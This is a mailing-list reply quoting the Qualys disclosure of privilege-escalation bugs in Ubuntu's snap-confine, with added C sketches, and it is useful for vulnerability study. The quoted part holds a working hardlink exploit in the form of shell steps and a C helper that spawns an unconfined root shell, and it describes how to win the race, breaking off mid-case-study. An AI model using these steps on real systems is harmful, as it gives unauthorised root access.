oss-security - Re: CVE-2021-44731: Race condition in snap-confine's setup_private

Message-ID: <Mw_ZpdC--3-2@tuta.io>
Date: Wed, 23 Feb 2022 08:54:49 +0100 (CET)
From: Wire Snark <wsnark@...a.io>
To: Oss Security <oss-security@...ts.openwall.com>
Cc: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: Re: CVE-2021-44731: Race condition in
 snap-confine's
 setup_private_mount()

Hello.

Can someone clarify CVE-2021-44730's dependency on hardlinking? This passage:

> Unfortunately, if we are able to hardlink snap-confine into a directory
> that we own, and if we execute this hardlink, then snap-confine will
> open our directory and execute our own, arbitrary snap-update-ns and
> snap-discard-ns programs, as root.
>
Why isn't it possible to copy the snap-confine binary into a directory for the same effect, instead of hardlinking it? I cannot see how a hardlink differs from a simple copy in this context.

Thanks!


Feb 17, 2022, 19:47 by qsa@...lys.com:

>
> Qualys Security Advisory
>
> Oh Snap! More Lemmings (Local Privilege Escalation in snap-confine)
>
>
> ========================================================================
> Contents
> ========================================================================
>
> Summary
> Two minor bugs
> An unexploitable bug
> CVE-2021-44730: Hardlink attack in snap-confine's sc_open_snapd_tool()
> CVE-2021-44731: Race condition in snap-confine's setup_private_mount()
> - Case study: Ubuntu Server, near-default installation
> - Case study: Ubuntu Desktop, default installation
> CVE-2021-3996: Unauthorized unmount in util-linux's libmount
> CVE-2021-3995: Unauthorized unmount in util-linux's libmount
> CVE-2021-3998: Unexpected return value from glibc's realpath()
> CVE-2021-3999: Off-by-one buffer overflow/underflow in glibc's getcwd()
> CVE-2021-3997: Uncontrolled recursion in systemd's systemd-tmpfiles
> Acknowledgments
> Timeline
>
>
>  "Some of the new puzzles are superb and will have you scratching your
>  head for some time as you check out all the possible routes and find
>  most of them are red herrings."
>  -- John Sweeney (1992). "Oh No! More Lemmings". New Atari User (55).
>
>
> ========================================================================
> Summary
> ========================================================================
>
> We recently audited snap-confine (a SUID-root program that is installed
> by default on Ubuntu) and discovered two vulnerabilities (two Local
> Privilege Escalations, from any user to root): CVE-2021-44730 and
> CVE-2021-44731.
>
>  "Snap is a software packaging and deployment system developed by
>  Canonical for operating systems that use the Linux kernel. The
>  packages, called snaps, and the tool for using them, snapd, work
>  across a range of Linux distributions and allow upstream software
>  developers to distribute their applications directly to users. Snaps
>  are self-contained applications running in a sandbox with mediated
>  access to the host system." (Wikipedia)
>
>  "snap-confine is a program used internally by snapd to construct the
>  execution environment for snap applications." (man snap-confine)
>
> Discovering and exploiting a vulnerability in snap-confine has been
> extremely challenging (especially in a default installation of Ubuntu),
> because snap-confine uses a very defensive programming style, AppArmor
> profiles, seccomp filters, mount namespaces, and two Go helper programs.
> Eventually, we discovered two vulnerabilities:
>
> - CVE-2021-44730, a hardlink attack that is exploitable in a non-default
>  configuration only (when the kernel's fs.protected_hardlinks is 0);
>
> - CVE-2021-44731, a race condition that is exploitable in default
>  installations of Ubuntu Desktop, and near-default installations of
>  Ubuntu Server (the default installation, plus one of the "Featured
>  Server Snaps" that are offered during the installation; for example,
>  "heroku" or "microk8s").
>
> While working on snap-confine, we also discovered several
> vulnerabilities in related packages and libraries: CVE-2021-3996 and
> CVE-2021-3995 in util-linux (libmount and umount), CVE-2021-3998 and
> CVE-2021-3999 in the glibc (realpath() and getcwd()), and CVE-2021-3997
> in systemd (systemd-tmpfiles). We partially published these secondary
> vulnerabilities in January 2022, shortly after their patches became
> available:
>
>  https://www.openwall.com/lists/oss-security/2022/01/10/2
>  https://www.openwall.com/lists/oss-security/2022/01/24/2
>  https://www.openwall.com/lists/oss-security/2022/01/24/4
>
> If you enjoy puzzle games like Lemmings (which turns 31 this year!),
> then we hope that you will enjoy this advisory.
>
>
>
> ========================================================================
> Two minor bugs
> ========================================================================
>
>  Don't let your eyes deceive you
>  -- Lemmings, Fun Level 15
>
> We almost abandoned our audit after a few days, because snap-confine is
> programmed very defensively, and it has been thoroughly reviewed before
> (by Matthias Gerstner of the SUSE Security Team):
>
>  https://www.openwall.com/lists/oss-security/2019/04/18/4
>  https://bugzilla.suse.com/show_bug.cgi?id=1127368
>
> Nevertheless, we decided to continue our audit because we spotted two
> minor bugs (probably typos) and began to suspect that nastier bugs might
> be hiding in snap-confine. Both minor bugs are located in the main()
> function:
>
> ------------------------------------------------------------------------
> 433         sc_identity real_user_identity = {
> 434                 .uid = real_uid,
> 435                 .gid = real_gid,
> 436                 .change_uid = 1,
> 437                 .change_gid = 1,
> 438         };
> 439         sc_set_effective_identity(real_user_identity);
> ...
> 466         if (getresuid(&real_uid, &effective_uid, &saved_uid) != 0) {
> 467                 die("getresuid failed");
> 468         }
> ...
> 494         // Permanently drop if not root
> 495         if (effective_uid == 0) {
> ...
> 498                 if (setgid(real_gid) != 0)
> 499                         die("setgid failed");
> 500                 if (setuid(real_uid) != 0)
> 501                         die("setuid failed");
> 502 
> 503                 if (real_gid != 0 && (getuid() == 0 || geteuid() == 0))
> 504                         die("permanently dropping privs did not work");
> 505                 if (real_uid != 0 && (getgid() == 0 || getegid() == 0))
> 506                         die("permanently dropping privs did not work");
> 507         }
> ...
> 542         execv(invocation.executable, (char *const *)&argv[0]);
> ------------------------------------------------------------------------
>
> The "real_gid" at line 503 should be "real_uid", and the "real_uid" at
> line 505 should be "real_gid". This first bug does not have dangerous
> consequences, because lines 503-506 are basically defense-in-depth
> checks: lines 498-501 have already checked that the root privileges
> were dropped successfully.
>
> Moreover, the second minor bug prevents snap-confine from actually
> entering the code block at lines 495-507: the effective_uid at line 495
> is in fact not 0 anymore, because the effective uid was set to the real,
> unprivileged uid at lines 433-439, and the effective_uid variable was
> set to this unprivileged uid at lines 466-468.
>
> This second bug may seem serious at first glance, because it prevents
> snap-confine from calling the privilege-dropping functions setuid() and
> setgid() (at lines 498-501) before a user-controlled program is executed
> (at line 542). In reality this does not have dangerous consequences: the
> only remaining privileged uid (the saved uid) is automatically reset to
> the effective, unprivileged uid by the execve() syscall (at line 542).
>
> Despite their practical uselessness, these two minor bugs motivated us
> to continue our audit, and we are deeply grateful to them.
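
For readers following along, here is a minimal sketch of what the defense-in-depth check at lines 503-506 presumably intended, with each real id compared against ids of the same kind. The helper name root_ids_remain() and its parameters are hypothetical and are not taken from snap-confine; this is an illustration, not the upstream fix.

```c
#include <assert.h>     /* assert() is only used by the usage example below */
#include <sys/types.h>

/*
 * Hypothetical helper (not part of snap-confine): returns 1 if a supposedly
 * permanent privilege drop left a root uid or gid behind, 0 otherwise.
 * The real uid is checked against the current uids, and the real gid
 * against the current gids (the quoted code had the two swapped).
 */
static int root_ids_remain(uid_t real_uid, gid_t real_gid,
                           uid_t cur_uid, uid_t cur_euid,
                           gid_t cur_gid, gid_t cur_egid)
{
        /* A non-root real uid must not coexist with a root uid or euid. */
        if (real_uid != 0 && (cur_uid == 0 || cur_euid == 0))
                return 1;
        /* A non-root real gid must not coexist with a root gid or egid. */
        if (real_gid != 0 && (cur_gid == 0 || cur_egid == 0))
                return 1;
        return 0;
}
```

A caller would pass the values returned by getuid(), geteuid(), getgid() and getegid(). With real_uid=1000, real_gid=0 and a uid that is still 0, this version reports a failure, whereas the swapped condition quoted at line 503 would not.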
>
>
>
> ========================================================================
> An unexploitable bug
> ========================================================================
>
>  DON'T PANIC
>  -- Oh No! More Lemmings, Crazy Level 19
>
> We also discovered a minor bug in the sc_call_snap_update_ns_as_user()
> function:
>
> ------------------------------------------------------------------------
> 112         const char *xdg_runtime_dir = getenv("XDG_RUNTIME_DIR");
> 113         char xdg_runtime_dir_env[PATH_MAX + strlen("XDG_RUNTIME_DIR=")];
> 114         if (xdg_runtime_dir != NULL) {
> 115                 sc_must_snprintf(xdg_runtime_dir_env,
> 116                                  sizeof(xdg_runtime_dir_env),
> 117                                  "XDG_RUNTIME_DIR=%s", xdg_runtime_dir);
> 118         }
> ...
> 127         char *envp[] = {
> ...
> 132                 xdg_runtime_dir_env, NULL
> 133         };
> 134         sc_call_snapd_tool_with_apparmor(snap_update_ns_fd,
> 135                                          "snap-update-ns", apparmor,
> 136                                          aa_profile, argv, envp);
> ------------------------------------------------------------------------
>
> If we execute snap-confine without an XDG_RUNTIME_DIR environment
> variable, then the stack-based buffer xdg_runtime_dir_env[] is not
> initialized (lines 112-118), and the uninitialized contents of this
> buffer are passed as an environment variable to snap-update-ns (lines
> 127-136), a helper program that is executed with root privileges.
>
> This bug may also seem serious at first glance (because we may be able
> to control the contents of this uninitialized buffer), but we do not
> believe that it is exploitable:
>
> - snap-update-ns is a statically-linked Go program, and therefore does
>  not process most of the "unsecure" environment variables (LD_PRELOAD,
>  LD_AUDIT, etc);
>
> - snap-update-ns is executed with effective uid 0 but unprivileged real
>  uid (like a SUID-root program), and therefore runs in "secure" mode
>  (__libc_enable_secure);
>
> - snap-update-ns calls clearenv() in its bootstrap function, and thereby
>  erases all environment variables (another layer of defense in depth).
>
> More importantly, the size of sc_call_snap_update_ns_as_user()'s stack
> frame (which contains the uninitialized buffer xdg_runtime_dir_env[]) is
> ~8KB, but the stack-frame size of sc_do_mount() (which is called before
> sc_call_snap_update_ns_as_user()) is ~10KB and is filled with zeros. In
> other words, xdg_runtime_dir_env[] is indirectly filled with zeros (by
> sc_do_mount()) and we cannot pass an arbitrary environment variable to
> snap-update-ns (just an empty environment variable).
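
A minimal sketch of one way to avoid handing an uninitialized buffer to envp[]: always leave a valid, NUL-terminated string in the buffer, and tell the caller whether the variable was actually set. The helper format_xdg_runtime_dir_env() is hypothetical; snap-confine itself uses sc_must_snprintf(), and this is not claimed to be the upstream fix.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/*
 * Hypothetical helper (not snap-confine's code): writes
 * "XDG_RUNTIME_DIR=<value>" into out and returns 1. If value is NULL or the
 * result would not fit, out is set to the empty string and 0 is returned.
 * In every case out holds a valid, NUL-terminated string afterwards.
 */
static int format_xdg_runtime_dir_env(const char *value, char *out,
                                      size_t out_size)
{
        assert(out != NULL && out_size > 0);

        out[0] = '\0';          /* defined contents even if we return early */
        if (value == NULL)
                return 0;

        int n = snprintf(out, out_size, "XDG_RUNTIME_DIR=%s", value);
        if (n < 0 || (size_t)n >= out_size) {
                out[0] = '\0';  /* error or truncation: export nothing */
                return 0;
        }
        return 1;
}
```

The caller can then append the buffer to envp[] only when the function returns 1, so a missing XDG_RUNTIME_DIR results in no entry at all rather than in whatever happened to be on the stack.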
>
>
>
> ========================================================================
> CVE-2021-44730: Hardlink attack in snap-confine's sc_open_snapd_tool()
> ========================================================================
>
>  Easy when you know how
>  -- Lemmings, Fun Level 17
>
> snap-confine dynamically obtains the path to snap-update-ns and
> snap-discard-ns (two helper programs that are executed with root
> privileges) by reading its own path via /proc/self/exe (at line 166), by
> opening this path's directory (at line 174), and by opening the helper
> program inside this directory (at line 179) -- this helper program is
> later executed via fexecve():
>
> ------------------------------------------------------------------------
>  69 int sc_open_snap_update_ns(void)
>  70 {
>  71         return sc_open_snapd_tool("snap-update-ns");
>  72 }
> ------------------------------------------------------------------------
> 139 int sc_open_snap_discard_ns(void)
> 140 {
> 141         return sc_open_snapd_tool("snap-discard-ns");
> 142 }
> ------------------------------------------------------------------------
> 160 static int sc_open_snapd_tool(const char *tool_name)
> 161 {
> ...
> 166         if (readlink("/proc/self/exe", buf, sizeof buf) < 0) {
> ...
> 172         char *dir_name = dirname(buf);
> ...
> 174         dir_fd = open(dir_name, O_PATH | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
> ...
> 179         tool_fd = openat(dir_fd, tool_name, O_PATH | O_NOFOLLOW | O_CLOEXEC);
> ...
> 184         return tool_fd;
> 185 }
> ------------------------------------------------------------------------
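
The lookup described above (readlink() on /proc/self/exe, then dirname()) can be sketched in isolation as follows. The function name self_exe_dir() is hypothetical and the error handling is simplified; the point is only that the resulting directory is wherever the running binary's path happens to be.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <libgen.h>
#include <stddef.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Illustrative only (not snap-confine's code): stores the directory of the
 * running executable in buf, as derived from /proc/self/exe. Returns 0 on
 * success, -1 on error or if the path may have been truncated.
 */
static int self_exe_dir(char *buf, size_t size)
{
        assert(buf != NULL && size > 1);

        /* readlink() does not NUL-terminate, so keep one byte in reserve. */
        ssize_t n = readlink("/proc/self/exe", buf, size - 1);
        if (n < 0 || (size_t)n >= size - 1)
                return -1;
        buf[n] = '\0';

        /* dirname() may modify buf, and may return a pointer elsewhere. */
        char *dir = dirname(buf);
        if (dir != buf)
                memmove(buf, dir, strlen(dir) + 1);
        return 0;
}
```

Called from a binary that was started as /tmp/.tmp/snap-confine, a function like this yields /tmp/.tmp, which is why helper programs looked up relative to it come from the attacker's directory.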
>
> Unfortunately, if we are able to hardlink snap-confine into a directory
> that we own, and if we execute this hardlink, then snap-confine will
> open our directory and execute our own, arbitrary snap-update-ns and
> snap-discard-ns programs, as root.
>
> Important note: this is impossible in a default configuration (although
> the kernel's fs.protected_hardlinks is 0 by default, the distributions
> set this sysctl to 1 by default). Consequently, in the following proof
> of concept, we exploit a default installation of Ubuntu Server whose
> fs.protected_hardlinks sysctl has been manually reset to 0.
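
On the hardlink-versus-copy question: a hardlink is a second name for the same inode, so it keeps the original owner and mode (for snap-confine, root and the set-user-ID bit), whereas a copy made by an unprivileged user is a new inode owned by that user. The sketch below demonstrates only the inode part, using throwaway files in a temporary directory; the function name and the /tmp/linkdemo.XXXXXX template are assumptions made for illustration, and an empty second file stands in for the copy.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>     /* assert() is only used by the usage example below */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * Demo in a fresh temporary directory: creates a file, a hardlink to it,
 * and a separate file standing in for a copy. Returns 1 if the hardlink
 * shares the original's inode while the stand-in copy does not, 0 if that
 * is not the case, and -1 on setup error.
 */
static int hardlink_shares_inode_but_copy_does_not(void)
{
        char dir[] = "/tmp/linkdemo.XXXXXX";
        char orig[64], hard[64], copy[64];
        struct stat so, sh, sc;
        int result = -1;

        if (mkdtemp(dir) == NULL)
                return -1;
        snprintf(orig, sizeof orig, "%s/orig", dir);
        snprintf(hard, sizeof hard, "%s/hard", dir);
        snprintf(copy, sizeof copy, "%s/copy", dir);

        int fd_orig = open(orig, O_WRONLY | O_CREAT | O_EXCL, 0600);
        int fd_copy = open(copy, O_WRONLY | O_CREAT | O_EXCL, 0600);

        if (fd_orig >= 0 && fd_copy >= 0 && link(orig, hard) == 0 &&
            stat(orig, &so) == 0 && stat(hard, &sh) == 0 &&
            stat(copy, &sc) == 0) {
                int link_same = so.st_dev == sh.st_dev && so.st_ino == sh.st_ino;
                int copy_same = so.st_dev == sc.st_dev && so.st_ino == sc.st_ino;
                /* Same inode implies same owner and same mode bits. */
                result = link_same && !copy_same && so.st_nlink == 2;
        }

        /* Best-effort cleanup of everything created above. */
        if (fd_orig >= 0)
                close(fd_orig);
        if (fd_copy >= 0)
                close(fd_copy);
        unlink(hard);
        unlink(copy);
        unlink(orig);
        rmdir(dir);
        return result;
}
```

This works here because the demo links to a file it owns. With fs.protected_hardlinks set to 1, the kernel refuses link() on a file that the caller neither owns nor can read and write, which is why the attack needs the sysctl reset to 0.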
>
> ________________________________________________________________________
>
> First, failed attempt
> ________________________________________________________________________
>
> First, as an unprivileged user, we make sure that the "lxd" snap (the
> only snap installed by default on Ubuntu Server) has been started
> (although it should have been started automatically at boot time):
>
> ------------------------------------------------------------------------
> $ id
> uid=1001(jane) gid=1001(jane) groups=1001(jane)
>
> $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd /usr/lib/snapd/snap-confine --base core18 snap.lxd.daemon /nonexistent
> ...
> ------------------------------------------------------------------------
>
> Next, we hardlink snap-confine into a directory in /tmp, and (in the
> same directory) we create a simple snap-discard-ns program that should
> eventually be executed as root:
>
> ------------------------------------------------------------------------
> $ mkdir -m 0700 /tmp/.tmp
> $ cd /tmp/.tmp
> $ ln -i /usr/lib/snapd/snap-confine ./
> $ cp -i "$(which true)" snap-update-ns
>
> $ cat > snap-discard-ns.c << "EOF"
> #include <sys/types.h>
> #include <unistd.h>
>
> int main(void) {
>  if (setuid(0)) _exit(__LINE__);
>  if (setgid(0)) _exit(__LINE__);
>
>  char * const argv[] = { "/bin/bash", "-c", "id; cat /proc/self/attr/current", NULL };
>  execve(*argv, argv, NULL);
>  _exit(__LINE__);
> }
> EOF
> $ gcc -o snap-discard-ns snap-discard-ns.c
> ------------------------------------------------------------------------
>
> Last, we execute our hardlinked snap-confine with a different base
> ("snapd" instead of "core18"), which forces snap-confine to restart the
> "lxd" snap and therefore to execute our own snap-discard-ns program:
>
> ------------------------------------------------------------------------
> $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd ./snap-confine --base snapd snap.lxd.daemon /nonexistent
> ...
> DEBUG: apparmor label on snap-confine is: unconfined
> DEBUG: apparmor mode is: (null)
> snap-confine has elevated permissions and is not confined but should be. Refusing to continue to avoid permission escalation attacks
> ------------------------------------------------------------------------
>
> This first attempt failed: snap-confine exited because it detected that
> it was "unconfined" -- it is normally confined by an AppArmor profile
> named "/usr/lib/snapd/snap-confine", which was not applied here because
> we executed /tmp/.tmp/snap-confine, not /usr/lib/snapd/snap-confine.
>
> ________________________________________________________________________
>
> Second, failed attempt
> ________________________________________________________________________
>
> To solve this first problem, we force snap-confine's AppArmor profile on
> /tmp/.tmp/snap-confine, by wrapping its execution in aa-exec (a tool for
> confining a program with an AppArmor profile):
>
> ------------------------------------------------------------------------
> $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -p /usr/lib/snapd/snap-confine -- ./snap-confine --base snapd snap.lxd.daemon /nonexistent
> ...
> cannot execute snapd tool snap-discard-ns: Permission denied
> snap-discard-ns failed with code 1
> ------------------------------------------------------------------------
>
> This second attempt also failed, because snap-confine's AppArmor profile
> denied the execution of our snap-discard-ns program in /tmp:
>
> ------------------------------------------------------------------------
> # dmesg | tail -n 1
> [16732.767948] audit: type=1400 audit(1635093756.584:30): apparmor="DENIED" operation="exec" profile="/usr/lib/snapd/snap-confine" name="/tmp/.tmp/snap-discard-ns" pid=1777 comm="snap-confine" requested_mask="x" denied_mask="x" fsuid=0 ouid=1001
> ------------------------------------------------------------------------
>
> ________________________________________________________________________
>
> Third, failed attempt
> ________________________________________________________________________
>
> To solve this second problem, we reviewed snap-confine's AppArmor
> profile (in /etc/apparmor.d/usr.lib.snapd.snap-confine.real) and noticed
> that it allows the execution of programs in ~/.Private:
>
>  @{HOME}/.Private/** mrixwlk,
>
> We therefore move our /tmp/.tmp directory to ~/.Private, and make
> another attempt:
>
> ------------------------------------------------------------------------
> $ mkdir -m 0700 ~/.Private
> $ cd ~/.Private
> $ mv -i /tmp/.tmp ./
> $ cd .tmp
>
> $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -p /usr/lib/snapd/snap-confine -- ./snap-confine --base snapd snap.lxd.daemon /nonexistent
> ...
> snap-discard-ns failed with code 10
> ------------------------------------------------------------------------
>
> This third attempt succeeded in executing our snap-discard-ns program,
> but failed to subsequently execute /bin/bash (again because of
> snap-confine's AppArmor profile):
>
> ------------------------------------------------------------------------
> # dmesg | tail -n 1
> [16991.232201] audit: type=1400 audit(1635094015.048:31): apparmor="DENIED" operation="exec" profile="/usr/lib/snapd/snap-confine" name="/usr/bin/bash" pid=1789 comm="6" requested_mask="x" denied_mask="x" fsuid=0 ouid=0
> ------------------------------------------------------------------------
>
> ________________________________________________________________________
>
> Fourth, partially successful attempt
> ________________________________________________________________________
>
> To solve this third problem, we noticed that snap-confine's AppArmor
> profile allows the transition to AppArmor profiles that are not
> "unconfined" and that do not start with '/':
>
>  change_profile unsafe /** -> [^u/]**,
>
> and we also noticed that one of the "lxd" snap's AppArmor profiles
> ("snap.lxd.daemon" in /var/lib/snapd/apparmor/profiles/snap.lxd.daemon)
> is more permissive than snap-confine's profile. We therefore modify our
> snap-discard-ns program, to transition to the "snap.lxd.daemon" profile
> when executing /bin/bash (by writing "exec snap.lxd.daemon" to the file
> /proc/self/attr/exec, which is what "aa-exec -p snap.lxd.daemon" does):
>
> ------------------------------------------------------------------------
> $ cat > snap-discard-ns.c << "EOF"
> #include <sys/types.h>
> #include <unistd.h>
> #include <stdio.h>
>
> int main(void) {
>  if (setuid(0)) _exit(__LINE__);
>  if (setgid(0)) _exit(__LINE__);
>
>  FILE * const fp = fopen("/proc/self/attr/exec", "w");
>  if (!fp) _exit(__LINE__);
>  if (fputs("exec snap.lxd.daemon", fp) < 0) _exit(__LINE__);
>  if (fclose(fp)) _exit(__LINE__);
>
>  char * const argv[] = { "/bin/bash", "-c", "id; cat /proc/self/attr/current", NULL };
>  execve(*argv, argv, NULL);
>  _exit(__LINE__);
> }
> EOF
> $ gcc -o snap-discard-ns snap-discard-ns.c
>
> $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -p /usr/lib/snapd/snap-confine -- ./snap-confine --base snapd snap.lxd.daemon /nonexistent
> ...
> uid=0(root) gid=0(root) groups=0(root),1001(jane)
> snap.lxd.daemon (enforce)
> ...
> ------------------------------------------------------------------------
>
> This fourth attempt succeeded in executing /bin/bash and id, but this
> root shell is still confined ("snap.lxd.daemon (enforce)") and we would
> rather obtain an unconfined root shell.
>
> ________________________________________________________________________
>
> Fifth, successful attempt
> ________________________________________________________________________
>
> To solve this fourth and last problem, we noticed that the AppArmor
> profile "snap.lxd.daemon" allows the unconfined execution of aa-exec:
>
>  /{,usr/}{,s}bin/aa-exec ux,
>
> We therefore modify our snap-discard-ns program, to wrap the execution
> of our shell commands in "aa-exec -p unconfined":
>
> ------------------------------------------------------------------------
> $ cat > snap-discard-ns.c << "EOF"
> #include <sys/types.h>
> #include <unistd.h>
> #include <stdio.h>
>
> int main(void) {
>  if (setuid(0)) _exit(__LINE__);
>  if (setgid(0)) _exit(__LINE__);
>
>  FILE * const fp = fopen("/proc/self/attr/exec", "w");
>  if (!fp) _exit(__LINE__);
>  if (fputs("exec snap.lxd.daemon", fp) < 0) _exit(__LINE__);
>  if (fclose(fp)) _exit(__LINE__);
>
>  char * const argv[] = { "/bin/bash", "-c", "exec aa-exec -p unconfined -- "
>  "/bin/bash -c 'id; cat /proc/self/attr/current'", NULL };
>  execve(*argv, argv, NULL);
>  _exit(__LINE__);
> }
> EOF
> $ gcc -o snap-discard-ns snap-discard-ns.c
>
> $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -p /usr/lib/snapd/snap-confine -- ./snap-confine --base snapd snap.lxd.daemon /nonexistent
> ...
> uid=0(root) gid=0(root) groups=0(root),1001(jane)
> unconfined
> ...
> ------------------------------------------------------------------------
>
> Finally, this fifth attempt successfully executed an unconfined root
> shell.
>
> Although we consider this attack impractical (because the sysctl
> fs.protected_hardlinks is 1 by default), it gave us the idea that
> eventually allowed us to exploit snap-confine in a default installation:
> what if we were able to create a copy of the SUID-root snap-confine in a
> writable directory like /tmp, but without creating a hardlink? We were
> particularly curious about bind-mounts, because snap-confine makes
> extensive use of bind-mounts to set up its sandboxes.
>
>
>
> ========================================================================
> CVE-2021-44731: Race condition in snap-confine's setup_private_mount()
> ========================================================================
>
>  It's all a matter of timing
>  -- Oh No! More Lemmings, Havoc Level 12
>
> To set up a snap's sandbox (more precisely, its mount namespace),
> snap-confine's function setup_private_mount() creates a temporary
> directory /tmp/snap.$SNAP_NAME/tmp (for example, /tmp/snap.lxd/tmp) --
> or reuses it if it already exists -- and bind-mounts it onto the /tmp
> directory inside the snap's mount namespace. setup_private_mount() is
> programmed very defensively (f*() and *at() syscalls, O_DIRECTORY and
> O_NOFOLLOW flags) to avoid race conditions:
>
> ------------------------------------------------------------------------
>  56 static void setup_private_mount(const char *snap_name)
>  57 {
>  ..
>  83         sc_must_snprintf(base_dir, sizeof(base_dir), "/tmp/snap.%s", snap_name);
>  84         sc_must_snprintf(tmp_dir, sizeof(tmp_dir), "%s/tmp", base_dir);
>  ..
>  91         if (mkdir(base_dir, 0700) < 0 && errno != EEXIST) {
>  ..
>  94         base_dir_fd = open(base_dir,
>  95                            O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);
> ...
> 106         if (fchmod(base_dir_fd, 0700) < 0) {
> ...
> 109         if (fchown(base_dir_fd, 0, 0) < 0) {
> ...
> 114         if (mkdirat(base_dir_fd, "tmp", 01777) < 0 && errno != EEXIST) {
> ...
> 118         tmp_dir_fd = openat(base_dir_fd, "tmp",
> 119                             O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);
> ...
> 123         if (fchmod(tmp_dir_fd, 01777) < 0) {
> ...
> 127         if (fchown(tmp_dir_fd, 0, 0) < 0) {
> ...
> 131         sc_do_mount(tmp_dir, "/tmp", NULL, MS_BIND, NULL);
> 132         sc_do_mount("none", "/tmp", NULL, MS_PRIVATE, NULL);
> 133 }
> ------------------------------------------------------------------------
>
> Unfortunately, this function is vulnerable to a race condition, because
> line 131 passes an absolute path (/tmp/snap.lxd/tmp) to the mount()
> syscall, which does follow symlinks:
>
> - we create the directory /tmp/snap.lxd, before we execute snap-confine;
>
> - after the open() at line 94 but before the fchown() at line 109, we
>  replace /tmp/snap.lxd with another directory that contains a symlink
>  named "tmp" (which therefore becomes /tmp/snap.lxd/tmp) that points to
>  an arbitrary directory;
>
> - as a result, because the mount() at line 131 follows symlinks, we
>  trick snap-confine into bind-mounting an arbitrary directory onto /tmp
>  inside the snap's mount namespace.
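
The mismatch behind the steps above can be sketched without any privileges: a descriptor-based open() with O_NOFOLLOW refuses a symlink, while a later lookup by path name follows it. In the sketch below stat() stands in for mount(), which needs root; the function name and the /tmp/symdemo.XXXXXX template are assumptions for illustration, and no race is involved.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>     /* assert() is only used by the usage example below */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * Demo in a fresh temporary directory where <dir>/tmp is a symlink to
 * <dir>/target. Returns 1 if open() with O_NOFOLLOW refuses the symlink
 * while a plain path lookup (stat()) follows it to the target directory,
 * 0 if that is not the case, and -1 on setup error.
 */
static int nofollow_refuses_but_path_follows(void)
{
        char dir[] = "/tmp/symdemo.XXXXXX";
        char target[64], link_path[64];
        struct stat st_target, st_via_link;
        int result = -1;

        if (mkdtemp(dir) == NULL)
                return -1;
        snprintf(target, sizeof target, "%s/target", dir);
        snprintf(link_path, sizeof link_path, "%s/tmp", dir);

        if (mkdir(target, 0700) == 0 && symlink(target, link_path) == 0 &&
            stat(target, &st_target) == 0 &&
            stat(link_path, &st_via_link) == 0) {
                /* Same flags as the openat() quoted at lines 118-119. */
                int fd = open(link_path,
                              O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);
                int refused = fd < 0;
                if (fd >= 0)
                        close(fd);
                /* The path-based lookup ended up at the symlink's target. */
                int followed = st_target.st_dev == st_via_link.st_dev &&
                               st_target.st_ino == st_via_link.st_ino;
                result = refused && followed;
        }

        /* Best-effort cleanup of everything created above. */
        unlink(link_path);
        rmdir(target);
        rmdir(dir);
        return result;
}
```

The checks performed on the descriptors say nothing about what the same path name resolves to later, so a call that takes the path name again has to be treated as a fresh, unchecked lookup.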
>
> This race condition opens up a world of possibilities: inside the snap's
> mount namespace (which we can enter through snap-confine itself), we can
> bind-mount a world-writable, non-sticky directory onto /tmp, or we can
> bind-mount any other part of the filesystem onto /tmp. We will exploit
> this powerful primitive in the two following case studies.
>
> Note: we can reliably win this race condition, by monitoring
> /tmp/snap.lxd with inotify, by pinning our exploit and snap-confine to
> the same CPU with sched_setaffinity(), and by lowering snap-confine's
> scheduling priority with setpriority() and sched_setscheduler().
>
>
>
> ========================================================================
> Case study: Ubuntu Server, near-default installation
> ========================================================================
>
>  Not as complicated as it looks
>  -- Lemmings, Fun Level 8
>
> In this first case study, we exploit a default installation of Ubuntu
> Server, plus one of the "Featured Server Snaps" that are offered during
> the installation; we abuse the snap "heroku" here, but other snaps can
> be abused instead (for example, "microk8s").
>
> Our main idea is to exploit CVE-2021-44731, bind-mount the directory
> /usr/lib/snapd (which contains snap-confine) onto /tmp inside the snap's
> mount namespace, and reproduce our exploit for CVE-2021-44730 (without a
> hardlink): we execute /tmp/snap-confine (inside the snap's mount
> namespace), and force it to execute our own /tmp/snap-discard-ns
> program, as root.
>
> In theory, this seems impossible: if we bind-mount /usr/lib/snapd onto
> /tmp, then /tmp/snap-discard-ns will always be the real snap-discard-ns,
> not our own program. In practice, when snap-confine is executed inside a
> mount namespace, it first calls sc_reassociate_with_pid1_mount_ns(),
> which enters init's mount namespace, where /tmp is not bind-mounted:
> snap-confine executes /tmp/snap-discard-ns outside the snap's mount
> namespace, where we can create our own programs in /tmp.
>
> ________________________________________________________________________
>
> First, failed attempt
> ________________________________________________________________________
>
> In this first version of our exploit, we create an empty directory
> /tmp/snap.heroku and a directory /tmp/snap.XXXXXX that contains a "tmp"
> symlink to /usr/lib/snapd, and we exchange these two directories at the
> right time, to bind-mount /usr/lib/snapd onto /tmp inside heroku's mount
> namespace. The command we execute is "/usr/lib/snapd/snap-confine --base
> core snap.heroku.heroku /bin/bash -c 'sleep 10; /tmp/snap-confine --base
> snapd snap.heroku.heroku /nonexistent'".
>
> Note: if the "core" base is not installed, we can use the "core18" base
> instead, but then we must bind-mount /snap/snapd/current/usr/lib/snapd
> instead of /usr/lib/snapd (for glibc compatibility reasons).
>
> ------------------------------------------------------------------------
> $ id
> uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
>
> $ cd /tmp
